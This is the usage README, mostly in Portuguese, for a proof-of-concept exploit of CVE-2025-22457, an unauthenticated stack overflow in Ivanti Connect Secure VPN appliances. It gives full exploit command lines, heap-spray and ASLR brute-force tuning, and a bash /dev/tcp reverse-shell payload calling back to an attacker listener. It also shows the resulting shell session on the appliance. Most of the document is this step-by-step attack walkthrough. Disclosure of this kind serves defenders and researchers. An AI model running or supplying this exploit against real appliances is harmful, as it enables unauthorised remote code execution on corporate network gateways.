
PoC for CVE-2025-22457 - A remote unauthenticated stack based buffer overflow affecting Ivanti Connect Secure, Pulse Connect Secure, Ivanti Policy Secure, and ZTA Gateways
Um buffer overflow baseado em pilha remoto não autenticado que afeta Ivanti Connect Secure, Pulse Connect Secure, Ivanti Policy Secure e ZTA Gateways
Este é um exploit de prova de conceito para demonstrar a exploração do CVE-2025-22457. Para uma análise técnica completa da vulnerabilidade e estratégia de exploração, consulte nossa Análise Rapid7 aqui:
https://attackerkb.com/topics/0ybGQIkHzR/cve-2025-22457/rapid7-analysis
Podemos executar este script contra um alvo Ivanti Connect Secure vulnerável, versão 22.7r2.4 da seguinte forma:
Inicie um listener netcat para capturar o reverse shell.
C:\>ncat -lnvkp 8080
Execute o exploit e faça brute force do ASLR (Isso será lento).
C:\>ruby CVE-2025-22457.rb -t 192.168.86.111 -p 443 --lhost 192.168.86.35 --lport 8080
[2025-04-10 16:21:13 +0100] [+] Targeting https://192.168.86.111:443/
[2025-04-10 16:21:13 +0100] [+] Payload: bash -i >& /dev/tcp/192.168.86.35/8080 0>&1
[2025-04-10 16:21:13 +0100] [+] Detected version 22.7.2.3597
[2025-04-10 16:21:13 +0100] [+] Starting...
[2025-04-10 16:21:13 +0100] [+] Attempt 0, trying libdsplibs.so @ 0xf64ca000
[2025-04-10 16:21:13 +0100] Making connections...
[2025-04-10 16:21:18 +0100] Spraying...
[2025-04-10 16:22:27 +0100] Triggering..
Quando funcionar, você obterá um reverse shell.
C:\>ncat -lnvkp 8080
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::8080
Ncat: Listening on 0.0.0.0:8080
Ncat: Connection from 192.168.86.111.
Ncat: Connection from 192.168.86.111:20746.
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
bash-4.2$ id
id
uid=104(nr) gid=104(nr) groups=104(nr)
bash-4.2$ uname -a
uname -a
Linux localhost2 4.17.00.35-selinux-jailing-production #1 SMP Tue Jun 18 16:25:33 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
bash-4.2$
Dependendo do hardware subjacente, o número de CPUs disponíveis para o equipamento alvo determinará o número de processos filhos que o binário /home/bin/web irá gerar. Como todas as solicitações HTTPS recebidas serão distribuídas igualmente entre esses filhos, precisamos levar isso em consideração e realizar o heap spray um número suficiente de vezes para todos os processos filhos. Precisamos fazer isso porque, ao disparar a vulnerabilidade, não sabemos em qual processo filho ela será acionada. Portanto, precisamos que o heap spray esteja presente em todos os processos filhos.
Por exemplo, em um appliance vulnerável com root, execute o seguinte para ver o número de processos filhos /home/bin/web:
bash-4.2# ps -Al | grep web
ps -Al | grep web
4 S 104 3012 2394 0 80 0 - 26313 - ? 00:00:00 web
4 S 104 3013 2394 0 80 0 - 24931 - ? 00:00:00 web80
1 S 104 4947 3012 2 80 0 - 28209 - ? 00:01:27 web
1 S 104 5217 3012 1 80 0 - 31527 - ? 00:00:49 web
1 S 104 5695 3012 0 80 0 - 28199 - ? 00:00:00 web
1 S 104 5715 3012 0 80 0 - 28199 - ? 00:00:00 web
bash-4.2#
Você pode especificar o número esperado de filhos web através do argumento --web_children, por exemplo:
C:\>ruby CVE-2025-22457.rb -t 192.168.86.111 -p 443 --lhost 192.168.86.35 --lport 8080 --web_children 4
Se você estiver testando o PoC em um sistema local, pode querer evitar a força bruta no endereço base do libdsplibs. Nesse cenário, você pode passar um endereço base conhecido para o PoC através do argumento --libdsplibs. Por exemplo, em um appliance vulnerável com root, execute o seguinte:
bash-4.2# ps -A| grep web
ps -A| grep web
3200 ? 00:00:01 web80
20536 ? 00:00:02 web
bash-4.2# cat /proc/20536/maps | grep libdsplibs
cat /proc/20536/maps | grep libdsplibs
f642e000-f7994000 r-xp 00000000 fc:02 171879 /home/lib/libdsplibs.so
f7994000-f7995000 ---p 01566000 fc:02 171879 /home/lib/libdsplibs.so
f7995000-f79aa000 r--p 01566000 fc:02 171879 /home/lib/libdsplibs.so
f79aa000-f79e3000 rw-p 0157b000 fc:02 171879 /home/lib/libdsplibs.so
bash-4.2#
Então você pode passar o endereço base conhecido para o PoC da seguinte forma:
C:\>ruby CVE-2025-22457.rb -t 192.168.86.111 -p 443 --lhost 192.168.86.35 --lport 8080 --web_children 4 --libdsplibs 0xf642e000
[2025-04-10 16:21:13 +0100] [+] Targeting https://192.168.86.111:443/
[2025-04-10 16:21:13 +0100] [+] Payload: bash -i >& /dev/tcp/192.168.86.35/8080 0>&1
[2025-04-10 16:21:13 +0100] [+] Detected version 22.7.2.3597
[2025-04-10 16:21:13 +0100] [+] Starting...
[2025-04-10 16:21:13 +0100] [+] Attempt 0, trying libdsplibs.so @ 0xf642e000
[2025-04-10 16:21:13 +0100] Making connections...
[2025-04-10 16:21:18 +0100] Spraying...
[2025-04-10 16:22:27 +0100] Triggering...